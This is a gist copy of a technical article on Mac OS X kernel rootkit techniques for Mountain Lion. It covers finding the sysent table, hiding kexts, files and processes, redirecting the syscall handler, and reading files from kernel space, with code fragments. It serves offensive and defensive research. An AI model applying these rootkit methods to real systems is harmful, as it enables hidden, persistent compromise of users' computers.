Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save zchee/5973634d4ebf1fef099ab6b434d41bfc to your computer and use it in GitHub Desktop.
Save zchee/5973634d4ebf1fef099ab6b434d41bfc to your computer and use it in GitHub Desktop.
Title : Revisiting Mac OS X Kernel Rootkits
Author : fG!
Date : April 18, 2014
|=----------------=[ Revisiting Mac OS X Kernel Rootkits ]=-------------------=|
|=------------------------=[ fG! <> ]=---------------------------=|
--[ Contents
1 - Introduction
2 - The classic problems
2.1 - What is new since Tiger
2.2 - Sysent table discovery techniques
2.3 - Hiding the kext
2.4 - Hiding files
2.5 - Hiding processes
2.6 - Modifying the syscall handler
3 - Reading the filesystem from kernel land
3.1 - Real short overview of VFS
3.2 - The easy way - Apple loves rootkit authors!
3.3 - The more complex way
3.4 - Solving kernel symbols
4 - Executing userland binaries from the kernel
4.1 - Writing from kernel memory into userland processes
4.2 - Abusing (again!) dyld to inject and run code
4.3 - Finding the place to execute the injection
4.4 - Ideas are great, execution is everything
4.5 - The dynamic library
4.6 - Hiding our tracks
5 - Revisiting userland<->kernel communication
5.1 - Character devices and ioctl
5.2 - Kernel control KPI
5.3 - Ideas for our own alternative channels
6 - Anti-forensics
6.1 - Cheap tricks to reduce our footprint
6.2 - Attacking DTrace and other instrumentation features
6.2.1 - FSEvents
6.2.2 - kdebug
6.2.3 - TrustedBSD
6.2.4 - Auditing - Basic Security Module
6.2.5 - DTrace - syscall provider - fbt provider
6.3 - AV-Monster II
6.4 - Bypassing Little Snitch
6.5 - Zombie rootkits
7 - Caveats & Detection
8 - Final words
9 - References
10 - T3h l337 c0d3z
--[ 1 - Introduction
In Phrack #66, ghalen and wowie wrote about interesting OS X kernel rootkit
techniques. That article is almost 4 years old and 4 major OS X releases behind.
Today Mountain Lion is king and many of the presented techniques are not valid
anymore - Apple reacted and closed those "holes".
One hand is enough to count the number of known rootkits targetting Apple's OS.
The most recent public release was Rubylin [2], a simple rootkit that works with
Lion (v10.7) (if you can read Korean there is a very interesting memory
forensics analysis at [3]).
The commercial spyware industry recently leaked DaVinci (aka OS.X/Crisis), a
user/kernel rootkit with some interesting features and flaws [4]. There are
rumours about FinFisher but no OS X leak happened yet. Everything else is too old
and outdated.
The main goal of this article is to update public knowledge and introduce some
"new" techniques so both offensive and defensive sides can improve. It is
focused on the current version at the time of this writing, Mountain Lion,
The defensive knowledge and available tools are still poor. I hope this article
motivates others to invest time and resources to improve this scenario.
It is quite certain that the offensive knowledge is significantly ahead.
I tried to make this article as complete as possible but there is so much to
work to be done that it is a never-ending story. Some of the proposed solutions
can be improved or implemented in different and/or better ways. You are
encouraged to improve or develop new approaches and of course publish them. I
also like to learn from others ;-)
I hope you enjoy this (long) journey.
--[ 2 - The classic problems
This section starts by introducing important changes made since Tiger.
Then it discusses the old sysent retrieval techniques and their problems, and
presents a solution compatible with past, current, and future OS X versions.
It continues with improvements to classic rootkit features - hide and avoid
(easy) detection. It must be noticed that these were developed before the
in-kernel symbol resolution technique to be presented later, so they
might appear a bit unsophisticated. I think there is value in this knowledge and
that is why it is described under the original conditions.
----[ 2.1 - What is new since Tiger
The easiest and many favourite's spot to hook the system calls is the sysent
table - just replace a pointer and we are set. Apple has been improving the
defence of that "castle" by hiding the sysent table symbol and moving its
In Mountain Lion the table is now located in read-only memory (not a big problem
anyway). Syscall hijacking techniques like these can be easily found with basic
analysis tools, but they are still interesting and useful for other purposes as
to be shown later.
Another important change is that the kernel module list (kmod_info_t) is
deprecated. Before, the kernel extension rootkit could be easily hidden from
kextstat by manipulating this list. Now we must patch an I/O Kit OSArray class
called sLoadedKexts to hide from tools that list loaded kernel extensions. Snare
was the first to publicly discuss this issue, and the commercial spyware
OS.X/Crisis the first (afaik) to implement it. Its technique will be later
Mountain Lion finally introduced kernel ASLR. It might be harder to develop and
execute the necessary exploit to install the rootkit but after that it is
(mostly) business as usual.
Up to Snow Leopard, Apple removed the symbol table from the kernel space so
there was no easy way to solve non-exported symbols inside the kernel extension
or I/O Kit driver. This was changed in Lion by leaving the full __LINKEDIT
segment in kernel memory but marked as pageable. Snare shows this in one of his
posts [5] and rubilyn rootkit uses it. Beware that the formula they use has a
small problem - it assumes that the symbol table is located at the beginning of
__LINKEDIT. This is true in Lion but not in Mountain Lion.
I will show you how a solution that is stable, simple, and compatible with all
OS X versions. Too good to be true! :-)
----[ 2.2 - Sysent table discovery techniques
As described in Phrack 66 article, Landon Fuller [6] was first to come public
with a technique to solve the removal of exported sysent symbol.
His technique is based on the distance between the (still) exported nsysent
symbol (the number of entries in the sysent table, aka, number of syscalls) and
sysent. The problem with this approach is that Apple can move the location of
sysent between releases - offsets will change and the rootkit will fail and
expose itself. Not acceptable!
Lets illustrate this with an example, starting with Mountain Lion 10.8.2:
$ nm /mach_kernel | grep nsysent
ffffff8000839818 D _nsysent
The location of sysent can be found by disassembling the kernel and using one of
the three functions that reference it:
- unix_syscall
- unix_syscall64
- unix_syscall_return
For 10.8.2 the sysent pointer will be located at 0xFFFFFF80008000D0 and the
table located at 0xFFFFFF8000855840. Landon's formula does not apply here.
In Lion 10.7.5 we have:
$ nm mach_kernel_10_7_5 | grep nsysent
ffffff8000846ed8 D _nsysent
And sysent located at 0xFFFFFF8000842A40.
This confirms Apple moving around the pointer between different releases. Notice
that all previous values are from kernel at disk so no kernel ASLR slide is
included. The slide value will be disclosed whenever it is being used in the
Another technique is described in The Mac Hacker's Handbook [7], released in
2009 and targeting Leopard.
On page 332 there is a code snippet that searches memory for "something that has
the same structure as the sysent table.". The starting search point is the
nsysent symbol, increasing the memory pointer to lookup and match sysent array
That code snippet does not work with Snow Leopard because sysent array is
located before nsysent symbol. It must be modified to support specific versions
and releases.
These different examples demonstrate that Apple changes sysent location between
releases. A stable rootkit requires an universal technique.
The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if initial search failed. If
nsysent also stops being exported we would need to base the search in another
symbol and continue the cat & mouse game.
The reference symbol problem can be easily solved using a feature of x86
systems, the interrupt descriptor table (IDT). The IDT "is used by the processor
to determine the correct response to interrupts and exceptions." [8]. The
traditional implementation of syscalls is done via interrupt 80. The
response to this interrupt will be executed by a kernel function pointed to by
the IDT. IDT's location can be obtained using the asm instruction "sidt" (store
interrupt descriptor table register). It returns the table location so the next
step is to find out the address of the interrupt 80 handler.
Once we have the interrupt 80 handler address we can find out the base address
of the kernel. Kernel ASLR does not matter here because the handler address is
always a valid kernel code location - we are dynamically querying the system and
not using fixed addresses. To find the kernel base address is just a matter of
searching memory back for the magic value of the Mach-O header - 0xfeedfacf (64
bits) or 0xfeedface (32 bits).
One (curious) property of kernel ASLR implementation is that memory addresses in
kernel and kexts Mach-O headers already contain the ASLR slide, something that
does not happen in userland ASLR'ed binaries. The header in userland binaries is
never updated so it is not synced with the address where the binary is loaded
The next step is to process the Mach-O headers and find out where the __DATA
segment is located. The reason for this is that the sysent table is located in
there - we need to extract segment's start address and boundaries. Now it is
just a matter of searching memory for something that matches the sysent table.
Are there any performance problems doing things like this? The sysent location
is found in less than a second even on a 5 year old Core 2 Duo Macbook Pro. The
performance impact can be considered meaningless.
This method was applied successfully when the first Mountain Lion developer
preview became available and still works up to 10.8.2.
You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information is
available at [9].
What is the difference against using any other exported symbol instead of all
the trouble with the interrupt handler? Honestly, it is just a matter of
personal preference and technical "prowess". A symbol that breaks compatibility
if removed could be used instead with very low risk of Apple changing it.
Later, we will need to use at least one KPI so almost any symbol from it can be
used as search's starting point.
Another solution is to use one MSR register involved in the SYSCALL instruction.
A good candidate is the MSR register number 0xC0000082 (MSR_IA32_LSTAR), which
contains the SYSCALL entrypoint.
One way to get its value in 64 bits is the following (ripped from XNU):
#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))
static inline uint64_t rdmsr64(uint32_t msr)
uint32_t lo=0, hi=0;
rdmsr(msr, lo, hi);
return (((uint64_t)hi) << 32) | ((uint64_t)lo);
Calling rdmsr64(0xC0000082) will return the kernel address that will handle
64 bits syscalls via the SYSCALL interface. The register number 0x176
(MSR_IA32_SYSENTER_EIP) is the one we are interested at for 32 bits systems - it
is used for 32 bits syscalls via SYSENTER.
These are just a few possibilities to retrieve a valid address inside the
running kernel and then find the start address of the kernel Mach-O header
and sysent location. The location of the Mach-O header will be useful to compute
the kernel ASLR value (the slide is stored in a kernel variable but its symbol
is not exported!).
----[ 2.3 - Hiding the kext
As mentioned before, the kernel module list is deprecated in favor of a IOKit
OSArray class called sLoadedKexts. This introduces a new problem: how to find
its location since we are talking about IOKIT C++. The OS.X/Crisis spyware
implemented an interesting solution. It leverages a simple IOKit method that
references sLoadedKexts to find the object location.
The method is OSKext::lookupKextWithLoadTag [libkern/c++/OSKext.cpp]:
OSKext * OSKext::lookupKextWithLoadTag(uint32_t aTag)
OSKext * foundKext = NULL; // returned
uint32_t count, i;
count = sLoadedKexts->getCount(); <- use this location, for example
for (i = 0; i < count; i++) {
OSKext * thisKext = OSDynamicCast(OSKext, sLoadedKexts->getObject(i));
if (thisKext->getLoadTag() == aTag) {
foundKext = thisKext;
goto finish;
return foundKext;
There is no symbol resolution feature inside the Crisis kernel rootkit - the
symbol (__ZN6OSKext21lookupKextWithLoadTagEj) is solved by the userland
component and sent to the rootkit module via a sysctl. The function that hides
the rootkit starts by searching for the 0xE8 byte corresponding to the
IORecursiveLockLock() call. All searches are done using hex patterns. It then
uses fixed offsets to compute the location of the array and modify it.
The provided source code reimplements this technique.
The search could be made easier (and portable?) by disassembling this method.
The good news is that we can have a x86/x64 disassembler inside a kernel
extension thanks to diStorm [19] (other libraries probably work but I'm a
fan of diStorm, in particular after the introduction of the decompose
interface). To statically compile diStorm just import the source and include
files into your rootkit project. You also need to define SUPPORT_64BIT_OFFSET or
uncomment it at config.h.
Assuming we have no method to find kernel symbols inside the rootkit (this will
be later developed), we can use the disassembling engine to try to find the
functions or methods that we are interested in. The whole __text section can be
disassembled and searched for instruction patterns that are hopefully more
stable than hex patterns.
Testing this approach I was able to find the method referenced above with a
precision of 100% or 50%. The different rates depend on how strict are the
search parameters due to some differences between compiler output in kernel
versions. I'm talking about the number of calls, jmps, jnz, jae, which have
small variations between some versions (compiler upgrades, settings, etc).
The performance is amazing - it takes 1 second to disassemble and search the
whole kernel using a high-end Intel i7 cpu.
The main problem of Crisis's approach is that it depends on fixed offsets inside
the OSArray class. If anything changes it will break compatibility and
potentially crash or expose the rootkit.
Disassembling the kernel is useful to find patterns and leveraging them in
different cases. It is not perfect and does not solve all our problems but it is
another helpful tool.
----[ 2.4 - Hiding files
Files are hidden by modifying (at least) three different syscalls:
getdirentries, getdirentriesattr, and getdirentries64. Nothing new and
thoroughly described before.
What usually happens is that only the filename is matched - that is the
information directly available from the structures available in those three
syscalls. This means that a filename to be hidden will be matched in any folder,
something that can raise suspicion if a common filename is used. With a small
effort we can do better and learn something in the process.
Let's find out how to recover additional information to match specific file or
folder locations. Target function is getdirentries64 but the concepts apply to
the other two.
The structure that is commonly manipulated is:
struct direntry {
__uint64_t d_ino; /* file number of entry */
__uint64_t d_seekoff; /* seek offset (optional, used by servers) */
__uint16_t d_reclen; /* length of this record */
__uint16_t d_namlen; /* length of string in d_name */
__uint8_t d_type; /* file type, see below */
char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
The match is done against the field d_name, which only contains the current file
or folder without the full path. This is the reason why most implementations
only match the file anywhere in the filesystem.
Luckily for us, all syscalls functions prototypes contain the proc structure as
the first parameter. It contains enough information to match the full pathname.
struct proc {
struct filedesc *p_fd; /* Ptr to open files structure. */
struct filedesc {
struct fileproc **fd_ofiles; /* file structures for open files */
char *fd_ofileflags; /* per-process open file flags */
struct vnode *fd_cdir; /* current directory */
struct vnode *fd_rdir; /* root directory */
int fd_nfiles; /* number of open files allocated */
int fd_lastfile; /* high-water mark of fd_ofiles */
For example, to display all the open files by an arbitrary process calling
getdirentries64, we could use the following code:
void show_all_openfiles(struct proc *p)
// lock proc structure else we are asking for trouble
struct filedesc *fd = p->p_fd;
if (fd != NULL)
// for some reason fd_nfiles is not useful for this
int lastfile = fd->fd_lastfile;
// show all open files for this proc
for (int count = 0; count < lastfile; count++)
// fd_ofiles is an array of fileproc that contains file structs
// for all open files
struct fileproc *fp = fd->fd_ofiles[count];
// we are only interested in files so match fg_type field
if (fp != NULL &&
fp->f_fglob != NULL &&
fp->f_fglob->fg_type == DTYPE_VNODE)
// lock the vnode - fg_data cast depends on fg_type
// type is vnode so we know fg_data will point to a vnode_t
(*vnode_lock)((struct vnode*)fp->f_fglob->fg_data);
struct vnode *vn = (struct vnode*)fp->f_fglob->fg_data;
if (vn->v_name != NULL)
printf("[%d] Filename: %s\n", count, vn->v_name);
(*vnode_unlock)((struct vnode*)fp->f_fglob->fg_data);
The files listed by this function are not the files we want to hide but the
files opened by the binary calling this syscall. This information can be used,
for example, to find the path that a "ls" command is trying to list. The full
path can be extracted manually by iterating over the vnodes of each file, or by
using a KPI function (vn_getpath).
To build the path from vnodes, first we retrieve the vnode structure
correspondent to the file and then iterate over up to the filesystem root - each
vnode has a reference to its parent vnode.
struct vnode {
const char *v_name; /* name component of the vnode */
vnode_t v_parent; /* pointer to parent vnode */
Each path component can be sequentially matched until v_parent == NULLVP, which
means the filesystem root. If path matches what we want to hide then it is a
matter of removing that entry from direntry array as usual.
To find the folder or file being listed we can use the following trick, which
seems to hold true:
int lastfile = main_fd->fd_lastfile;
// lastfile has the information we are looking for
struct fileproc *last_fp = main_fd->fd_ofiles[lastfile];
The only word of caution is when shell expansion is involved. In this case last
file entry name will be a "ttys" and we need to iterate fd_ofiles array looking
for the previous element to "ttys" - it is not lastfile-1.
It looks complicated but it is not and just a matter of looking up the necessary
information in kernel structures. The proc structure is extremely rich and a
good starting point for many hacks. The biggest problem is being frequently
changed between major OS X versions.
With so many kernel functions available it is almost certain there is already a
function that will avoid us to build the path as described above. That function
is vn_getpath() from bsd/sys/vnode.h.
@function vn_getpath
@abstract Construct the path to a vnode.
@discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes impossible
to determine a vnode's full path. vn_getpath() will not enter the filesystem.
@param vp The vnode whose path to obtain.
@param pathbuf Destination for pathname; should be of size MAXPATHLEN
@param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
will be strlen(pathbuf) + 1.
@return 0 for success or an error code.
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);
We still need to retrieve a vnode from the proc structure to use this function.
To find the vnode we can use the lastfile trick to find the target path,
retrieve its vnode and then use this function to get the full path.
A better solution is to hide your data inside other data files that can't be
easily checksum'ed. Sqlite3 databases come to my mind [35].
----[ 2.5 - Hiding processes
The traditional way to hide processes is to remove them from the process list
maintained by the kernel. When an application requests the process list, the
rootkit intercepts and modifies the request. In this case, only the results are
modified and the underlying structures are still intact. A rootkit detection
tool can access those structures and compare with the results.
Another possibility is to remove the processes from the process list. This time
a tool that is based on those structures information will not be able to detect
the inconsistency because there is none (regarding only the proc list, because
there is data in other structures that can be used to signal inconsistencies).
Due to OS X design, things are a bit more fun (or complicated) because the BSD
layer runs on top of XNU layer. The basic process units are Mach tasks and
threads and there's a one-on-one mapping between BSD processes and Mach tasks.
The task is just a container and Mach threads are the units that execute code.
What matters for this case is that there is an additional list where
inconsistencies can be detected - the Mach tasks list.
Using an ascii version of nofate's diagram found at [3]:
proc <-> proc <-> proc <-> ...
^ ^ ^ BSD
v v v Mach
tasks <-> tasks <-> tasks <-> ...
The version with a hidden process at the BSD layer:
proc <------------> proc <-> ...
^ ^ ^ BSD
v v v Mach
tasks <-> tasks <-> tasks <-> ...
Each BSD process has reference to the Mach tasks list via a void pointer and
vice-versa. Transversing both lists can detect the inconsistency described above
and most certainly flag an installed rootkit (it is possible to have a Mach task
without a corresponding BSD process).
struct proc {
void *task; /* corresponding task (static) */
struct task {
void *bsd_info; /* the corresponding proc_t */
The (not so new) lesson to extract from this is that there many points to be
used for detecting inconsistencies in the system. These are hard to hide if the
goal is to hide one or more rogue processes. A much better solution is to
piggyback into normal processes, where detection is a bit harder - it can be a
normal process with an extra thread running for example. The piggyback solution
will be used later to run userland commands from the kernel.
----[ 2.6 - Modifying the syscall handler
A common technique to hide modifications to syscall table is to make a copy and
modify the syscall handler to point to this new one. Rootkit detection utils
that just verify the *legit* table are unable to detect it. There's nothing new
about this technique although I have never seen it in use in OS X. It is a good
opportunity to describe how to implement it.
The interrupt 0x80 is handled by the assembly function idt64_unix_scall
[osfmk/x86_64/idt64.s]. The IDT table definition [osfmk/x86_64/idt_table.h]
confirms this and can be runtime verified by querying the IDT and extracting the
address of int80 handler.
Follow the idt64_unix_scall assembler code. The switch to C happens when
unix_syscall[64] function is called, both for interrupt 0x80 and
sysenter/systrap system calls. This code path opens many opportunities to change
pointers, or install trampolines and redirect code to rootkit's implementation.
One such possibility is to change the table pointer inside unix_syscall[64].
This is sample code from the 64 bits version:
code = regs->rax & SYSCALL_NUMBER_MASK;
"unix_syscall64: code=%d(%s) rip=%llx\n",
code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->;
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(&regs->rdi);
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
Disassembly output (here I renamed memory references in IDA since they have no
symbols associated):
4C 03 2D 2D EA 21 00 add r13, cs:sysent
4C 3B 2D 26 EA 21 00 cmp r13, cs:sysent
74 0B jz short loc_FFFFFF80005E16B7
The sysent reference is to:
__DATA:__got:FFFFFF80008000D0 40 58 85 00 80 FF FF FF sysent dq offset
To directly find the location of sysent in the __got section is very easy. Find
out the location of sysent table using one of the section 2 techniques (or some
other) and then search the __got section for that address (to find the location
and boundaries of __got section we just need to read kernel's Mach-O header).
The easiest way to redirect sysent is to modify that pointer to our modified
copy. A (memory) forensic tool that (only) searches for and lookups the original
sysent table will fail to detect this and the next trick. For example, Volafox
v0.8 is vulnerable. Volatility's Mac version at the time of writing has yet no
sysent plugin available.
Another way is to modify the code reference to __got section and instead point
it to somewhere else. This is very easy to implement with diStorm's assistance.
Disassemble the unix_syscall[64] functions and lookup for references to __got
address. The instructions that need to be matched are ADD and CMP (this
assumption appears to hold always true). To calculate the RIP target address,
diStorm has a helper macro called INSTRUCTION_GET_RIP_TARGET().
If the RIP address matches the __got address the offset can be updated.
Calculate the offset to the address that contains the pointer to the new table
and update it at the instruction that referenced the old __got pointer.
One last (important!) detail. RIP addressing uses a 32 bits offset, which
appears to be enough to reference the new sysent (dynamically or statically
allocated) in most cases. This might not always be true - from my experience the
distance is very near the signed int limit.
One way to make this safer is to put the pointer in kernel's memory space. This
can be alignment space, Mach-O header (for the lulz!), or somewhere else (it is
just a data pointer so no need for exec permission).
--[ 3 - Reading the filesystem from kernel land
Now let's get going with the fun stuff that opens the door to even funnier
One of the annoying obstacles that Apple introduced against development of
rootkits is the lack of kernel's full __LINKEDIT segment up to Snow Leopard.
Useful symbols for rootkit development are also not exported. No one said
rootkit development was easy - fun but not always easy.
Possible solutions are to solve the symbols from userland, and pattern search
from the kext - this one easily susceptible to failure due to changing patterns
in kernel versions and compilers.
For example, OS.X/Crisis spyware adopts a mixed approach. Most symbols are
solved from the userland agent and communicated thru a character device to the
rootkit, but sLoadedKexts is solved with byte search - starting point is still a
symbol solved from userland.
The easiest solution to this problem is to read the kernel file (/mach_kernel)
from the rootkit and process the symbol table, as it is done from userland. The
extracted addresses need to be fixed with the kernel ASLR slide but that is
easily bypassed as described in section 2.2.
As far as I know no publicly known OS X rootkit ever implemented arbitrary
filesystem read, and probably very few to none in other platforms (TDSS being
the most famous in Windows). There is some kind of myth about the difficulty of
implementing this or something else that made rootkits developers avoid it. I
must confess I was influenced by that "myth" and never bothered to give it a try
before this article.
In practice the implementation is extremely easy!
Sometimes you just need to be in the right mood and give it a try.
Two methods will be shown, one very easy based on exported symbols (and a copy
of a very stable private extern kernel function), and another a bit more complex
that requires some unexported symbols. Both are based in VFS - the obvious and
easiest way to achieve our goal. Other functions can be used so many variations
are possible. That is left open for you to explore, I still have a lot to write
about in this paper :-)
----[ 3.1 - Real short overview of VFS
The Virtual-Filesystem Interface was introduced in 4.4BSD and first implemented
by Sun Microsystems. Before this innovation file entries directly referenced
filesystem inodes. This method does not scale well if there's more than a
filesystem type.
VFS is an additional extensible object-oriented layer that introduces an
abstraction of the underlying filesystem, making it easy to support multiple
filesystems. Instead of inodes there are vnodes. There is no need to deal with
the intricacies of multiple filesystems - we can use the VFS related functions
and let the kernel do the filesystem operations "dirtywork".
The most interesting VFS related structures to our purposes are:
- struct filedesc: defined at bsd/sys/filedesc.h, represents the open files in a
- struct fileproc: defined at bsd/sys/file_internal.h, represents each open
- struct fileglob: defined at bsd/sys/file_internal.h, contains all the
information associated to a file, including vnode and supported filesystem
- struct vnode: defined at bsd/sys/vnode_internal.h.
Detailed references about the design and implementation can be found at [20],
[14] and [13].
----[ 3.2 - The easy way - Apple loves rootkit authors!
The first piece of information that we need is the vnode of the target file we
want to read. We already seen in section 2.4 that this information is available
in proc_t structure but we can follow an easier path!
One suitable function is vnode_lookup() (available in BSD KPI). It is
defined at bsd/vfs/vfs_subr.c in XNU source code, and well documented at
bsd/sys/vnode.h include:
@function vnode_lookup
@abstract Convert a path into a vnode.
@discussion This routine is a thin wrapper around xnu-internal lookup routines;
if successful, it returns with an iocount held on the resulting vnode which must
be dropped with vnode_put().
@param path Path to look up.
@param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
@return Results 0 for success or an error code.
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);
The arguments are the path for the target file, search flags, a vnode_t pointer
for output and the vfs context for the current thread (or kernel context).
The vfs context can be obtained using the function vfs_context_current() but it
is only available in the Unsupported KPI - subject to whatever Apple wants to
do with it so not stable enough for our purposes. In practice the vfs context is
not a problem because Apple (or BSD's original code) took good care of us. Let
me show you why with kernel's implementation of vnode_lookup():
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
struct nameidata nd;
int error;
u_int32_t ndflags = 0;
if (ctx == NULL) { /* XXX technically an error */
ctx = vfs_context_current(); // <- thank you! :-)
Apple's love means that we just need a simple operation to retrieve kernel's
#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);
One important detail is that vnode_lookup() will increase the iocount on the
target vnode (in case you missed above note from vnode_lookup). We must release
it using vnode_put() when we do not need it anymore (after reading or writing
what we want). This function is also available in the BSD KPI.
Having kernel's vnode information we can finally read its contents from the
rootkit. To do that we can use the VNOP_READ() function - documented and
declared at bsd/sys/vnode_if.h.
@function VNOP_READ
@abstract Call down to a filesystem to read file data.
@discussion VNOP_READ() is where the hard work of of the read() system call
happens. The filesystem may use the buffer cache, the cluster layer, or an
alternative method to get its data; uio routines will be used to see that data
is copied to the correct virtual address in the correct address space and will
update its uio argument to indicate how much data has been moved.
@param vp The vnode to read from.
@param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
@param ctx Context against which to authenticate read request.
@return 0 for success or a filesystem-specific error. VNOP_READ() can return
success even if less data was read than originally requested; returning an error
value should indicate that something actually went wrong.
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);
The last missing piece is an uio structure. To create that buffer we can use
three other functions: uio_create(), uio_createwithbuffer() and uio_addiov().
Two are available in BSD KPIs - uio_create and uio_addiov. The other one,
uio_createwithbuffer is private extern and used by uio_create. We can rip its
implementation into our rootkit code from XNU source file bsd/kern/kern_subr.c.
It's simple and stable enough to make this possible (never modified in all
latest OS X versions).
Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().
An example how to create the required structure to hold a 4kbytes page:
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
The same example using uio_createwithbuffer:
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
First create the uio buffer, and then add it else it can't be used.
The data buffer can be a statically allocated buffer (as above) or dynamically
allocated using _MALLOC() or other available kernel variant.
Having the uio buffer created the last step is to execute the read:
error = VNOP_READ(kernel_vode, uio, 0, NULL);
If successful, the buffer will contain the first page (4096 bytes) of
/mach_kernel OS X kernel read into data_buffer.
A good implementation reference of this process is the kernel function
dqfileopen() [bsd/vfs/vfs_quota.c].
----[ 3.3 - The more complex way
This second approach was in fact how I started to explore this problem and
before I learnt about vnode_lookup(). It is a good backup method but the
learning experience and some techniques used to obtain some information are the
interesting bits here.
Its biggest inconvenience is that it requires the unexported symbol
VNOP_LOOKUP(). This function requires diferent arguments but has the same
functionality as vnode_lookup() - to lookup the vnode of a file or directory.
Documentation can be found at bsd/sys/vnode_if.h.
@function VNOP_LOOKUP
@abstract Call down to a filesystem to look for a directory entry by name.
@discussion VNOP_LOOKUP is the key pathway through which VFS asks a filesystem
to find a file. The vnode should be returned with an iocount to be dropped by
the caller. A VNOP_LOOKUP() calldown can come without a preceding VNOP_OPEN().
@param dvp Directory in which to look up file.
@param vpp Destination for found vnode.
@param cnp Structure describing filename to find, reason for lookup, and
various other data.
@param ctx Context against which to authenticate lookup request.
@return 0 for success or a filesystem-specific error.
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
The first argument is the vnode of the directory where the target file is
located. It is a kind of a chicken and egg problem because we do not have that
information - we want it! Do not fear, this information can be extracted from
somewhere else. As previously described, the proc structure contains the field
p_fd - pointer to open files structure (struct filedesc).
The filedesc structure has two interesting fields for our purposes:
1) fd_ofiles - an array of file structures for open files.
2) fd_cdir - vnode structure of current directory.
There is also fd_rdir, which is the vnode of root directory but from my tests it
is usually NULL.
The proc structure is a doubly-linked list - we can "walk" around it and
retrieve information of any process. In OS X, the kernel is just another Mach
task with PID 0 and a corresponding proc entry - before Leopard we could access
kernel task via task_for_pid(0), which allowed DKOM (direct kernel object
manipulation). The mach_kernel file is located at the root directory /.
The proposed procedure is to traverse the proc structure and find pid 0 (field
p_pid). When found, the field fd_cdir will contain what we need - the vnode for
the root directory.
Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We need an
alternative way! Two solutions: complicated and straightforward.
Recalling what was already described in section 2.4. Kernel's implementation of
syscall functions has a struct proc * as first parameter. Using open() as
open(struct proc *p, struct open_args *uap, int *retval)
What we can do is to temporarily (or not) hijack a syscall via sysent table and
get a reference to any proc_t. Since it is a doubly-linked list we can traverse
it and find PID 0. When found we can extract the vnode pointer for current
directory and that is it.
The kernel does not keep /mach_kernel open so the field fd_ofiles is not useful.
Luckly for us the fd_cdir is populated with the information we need - vnode of
root directory /.
The kernel knowledgeable reader knows there is no need for all this mess to
retrieve a proc_t structure. There is a BSD KPI function that solves the problem
with a single call, proc_find(). Its prototype is:
proc_t proc_find(int pid)
Kernel is just another task with PID 0, so just execute proc_find(0) and get the
required structure pointer. This will increase the reference count and must be
released using proc_rele(). Very easy, right? :-)
Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current() but
there is a better function that I found out while writing this section. It is
vfs_context_create(), available in BSD KPI.
@function vfs_context_create
@abstract Create a new vfs_context_t with appropriate references held.
@discussion The context must be released with vfs_context_rele() when no longer
in use.
@param ctx Context to copy, or NULL to use information from running thread.
@return The new context, or NULL in the event of failure.
vfs_context_t vfs_context_create(vfs_context_t);
We can use this function to create a new context and pass it to VNOP_LOOKUP().
The next step is to create a struct componentname [bsd/sys/vnode.h].
struct componentname {
// Arguments to lookup.
uint32_t cn_nameiop; /* lookup operation */
uint32_t cn_flags; /* flags (see below) */
void *cn_reserved1; /* use vfs_context_t */
void *cn_reserved2; /* use vfs_context_t */
// Shared between lookup and commit routines.
char *cn_pnbuf; /* pathname buffer */
int cn_pnlen; /* length of allocated buffer */
char *cn_nameptr; /* pointer to looked up name */
int cn_namelen; /* length of looked up component */
uint32_t cn_hash; /* hash value of looked up name */
uint32_t cn_consume; /* chars to consume in lookup() */
A small example to lookup /mach_kernel:
struct componentname cnp;
char tmpname[] = "mach_kernel";
bzero(&cnp, sizeof(cnp));
cnp.cn_nameiop = LOOKUP;
cnp.cn_flags = ISLASTCN;
cnp.cn_reserved1 = vfs_context_create(NULL);
cnp.cn_pnbuf = tmpname;
cnp.cn_pnlen = sizeof(tmpname);
cnp.cn_nameptr = cnp.cn_pnbuf;
cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?
Now we are ready to call VNOP_LOOKUP() and use the returned vnode information to
execute VNOP_READ() as in section 3.1 (do not forget to create first the UIO
Last but not least, there is another function we can (ab)use to read files -
vn_rdwr(). It was this function that triggered my curiosity about this process
while reading about the execution flow of a Mach-O binary. The parameters it
requires can be retrieved or created with the techniques above described or
others you might come up with. Feel free to implement it and discover
alternative ways to read the files (there are more!).
Writing is not harder than reading. Just browse the source files mentioned in
this section and the functions you need will be obvious. You can apply the
techniques here described to fill the required parameters.
----[ 3.4 - Solving kernel symbols
Snare on his blog post [5] explains in detail how to solve the kernel symbols.
